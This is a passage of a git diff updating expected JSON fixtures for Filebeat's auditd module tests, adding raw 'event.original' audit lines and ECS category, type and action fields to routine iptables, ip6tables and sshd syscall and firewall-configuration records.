"auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.534:48): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=13d0850 items=0 ppid=296 pid=479 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1407,15 +1854,19 @@ "@timestamp": "2016-12-07T02:16:25.537Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 49, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.537:49): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -1438,9 +1889,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.537:49): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=1125850 items=0 ppid=296 pid=481 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1465,15 +1923,19 @@ "@timestamp": "2016-12-07T02:16:25.538Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 50, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.538:50): table=security family=2 entries=4", "event.type": [ "change" ], @@ -1496,9 +1958,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.538:50): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=20a3600 items=0 ppid=296 pid=482 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1523,15 +1992,19 @@ "@timestamp": "2016-12-07T02:16:25.542Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 51, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.542:51): table=security family=2 entries=4", "event.type": [ "change" ], @@ -1554,9 +2027,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.542:51): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=9f0600 items=0 ppid=296 pid=484 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1581,15 +2061,19 @@ "@timestamp": "2016-12-07T02:16:25.543Z", "auditd.log.entries": 3, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 52, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.543:52): table=raw family=2 entries=3", "event.type": [ "change" ], @@ -1612,9 +2096,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.543:52): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=232e4d0 items=0 ppid=296 pid=485 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1639,15 +2130,19 @@ "@timestamp": "2016-12-07T02:16:25.546Z", "auditd.log.entries": 3, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 53, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.546:53): table=raw family=2 entries=3", "event.type": [ "change" ], @@ -1670,9 +2165,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.546:53): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=14404d0 items=0 ppid=296 pid=487 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1697,15 +2199,19 @@ "@timestamp": "2016-12-07T02:16:25.548Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 54, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.548:54): table=filter family=2 entries=4", "event.type": [ "change" ], @@ -1728,9 +2234,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.548:54): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=c31600 items=0 ppid=296 pid=488 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1755,15 +2268,19 @@ "@timestamp": "2016-12-07T02:16:25.552Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 55, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.552:55): table=filter family=2 entries=4", "event.type": [ "change" ], @@ -1786,9 +2303,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.552:55): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=143a600 items=0 ppid=296 pid=490 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1813,15 +2337,19 @@ "@timestamp": "2016-12-07T02:16:25.553Z", "auditd.log.entries": 5, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 56, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.553:56): table=nat family=10 entries=5", "event.type": [ "change" ], @@ -1844,9 +2372,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.553:56): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=109b880 items=0 ppid=296 pid=491 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1871,15 +2406,19 @@ "@timestamp": "2016-12-07T02:16:25.556Z", "auditd.log.entries": 5, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 57, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.556:57): table=nat family=10 entries=5", "event.type": [ "change" ], @@ -1902,9 +2441,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.556:57): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=b53880 items=0 ppid=296 pid=493 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1929,15 +2475,19 @@ "@timestamp": "2016-12-07T02:16:25.557Z", "auditd.log.entries": 6, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 58, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.557:58): table=mangle family=10 entries=6", "event.type": [ "change" ], @@ -1960,9 +2510,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.557:58): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=17b09e0 items=0 ppid=296 pid=494 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1987,15 +2544,19 @@ "@timestamp": "2016-12-07T02:16:25.560Z", "auditd.log.entries": 6, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 59, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.560:59): table=mangle family=10 entries=6", "event.type": [ "change" ], @@ -2018,9 +2579,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.560:59): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=25cc9e0 items=0 ppid=296 pid=496 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2045,15 +2613,19 @@ "@timestamp": "2016-12-07T02:16:25.562Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 60, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.562:60): table=security family=10 entries=4", "event.type": [ "change" ], @@ -2076,9 +2648,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.562:60): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=14db720 items=0 ppid=296 pid=497 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2103,15 +2682,19 @@ "@timestamp": "2016-12-07T02:16:25.566Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 61, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.566:61): table=security family=10 entries=4", "event.type": [ "change" ], @@ -2134,9 +2717,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.566:61): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=9d2720 items=0 ppid=296 pid=499 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2161,15 +2751,19 @@ "@timestamp": "2016-12-07T02:16:25.569Z", "auditd.log.entries": 3, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 62, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.569:62): table=raw family=10 entries=3", "event.type": [ "change" ], @@ -2192,9 +2786,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.569:62): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=fae5c0 items=0 ppid=296 pid=500 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2219,15 +2820,19 @@ "@timestamp": "2016-12-07T02:16:25.573Z", "auditd.log.entries": 3, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 63, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.573:63): table=raw family=10 entries=3", "event.type": [ "change" ], @@ -2250,9 +2855,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.573:63): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=19545c0 items=0 ppid=296 pid=502 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2277,15 +2889,19 @@ "@timestamp": "2016-12-07T02:16:25.575Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 64, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.575:64): table=filter family=10 entries=4", "event.type": [ "change" ], @@ -2308,9 +2924,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.575:64): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=23a3720 items=0 ppid=296 pid=503 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2335,15 +2958,19 @@ "@timestamp": "2016-12-07T02:16:25.578Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 65, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.578:65): table=filter family=10 entries=4", "event.type": [ "change" ], @@ -2366,9 +2993,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.578:65): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=162d720 items=0 ppid=296 pid=505 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2393,15 +3027,19 @@ "@timestamp": "2016-12-07T02:16:25.580Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 66, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.580:66): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2424,9 +3062,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.580:66): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=14b0850 items=0 ppid=296 pid=506 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2451,15 +3096,19 @@ "@timestamp": "2016-12-07T02:16:25.582Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 67, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.582:67): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2482,9 +3131,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.582:67): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=2398850 items=0 ppid=296 pid=507 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2509,15 +3165,19 @@ "@timestamp": "2016-12-07T02:16:25.583Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 68, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.583:68): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2540,9 +3200,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.583:68): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=2679850 items=0 ppid=296 pid=508 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2567,15 +3234,19 @@ "@timestamp": "2016-12-07T02:16:25.585Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 69, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.585:69): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2598,9 +3269,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.585:69): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=1715850 items=0 ppid=296 pid=509 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2625,15 +3303,19 @@ "@timestamp": "2016-12-07T02:16:25.587Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 70, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.587:70): table=mangle family=2 entries=6", "event.type": [ "change" ], diff --git a/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json b/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json index 3fb44f8934a6..c888d8d3c732 100644 --- a/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json @@ -13,9 +13,16 @@ "auditd.log.syscall": "43", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1492752520.441:8832): arch=c000003e syscall=43 success=yes exit=5 a0=3 a1=7ffd0dc80040 a2=7ffd0dc7ffd0 a3=0 items=0 ppid=1 pid=1663 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"sshd\" exe=\"/usr/sbin/sshd\" key=\"key=net\"", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -45,6 +52,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SOCKADDR msg=audit(1492752520.441:8832): saddr=0200E31C4853E6640000000000000000", "fileset.name": "log", "input.type": "log", "log.offset": 300, @@ -58,6 +66,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1492752520.441:8832): proctitle=\"(sshd)\"", "fileset.name": "log", "input.type": "log", "log.offset": 385, @@ -77,9 +86,16 @@ "auditd.log.syscall": "42", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1492753107.096:9004): arch=c000003e syscall=42 success=no exit=-115 a0=5 a1=7ffc12ac3ab0 a2=10 a3=4 items=0 ppid=1 pid=1648 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"google_ip_forwa\" exe=\"/usr/bin/python3.5\" key=\"key=net\"", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -109,6 +125,7 @@ "event.dataset": "auditd.log", 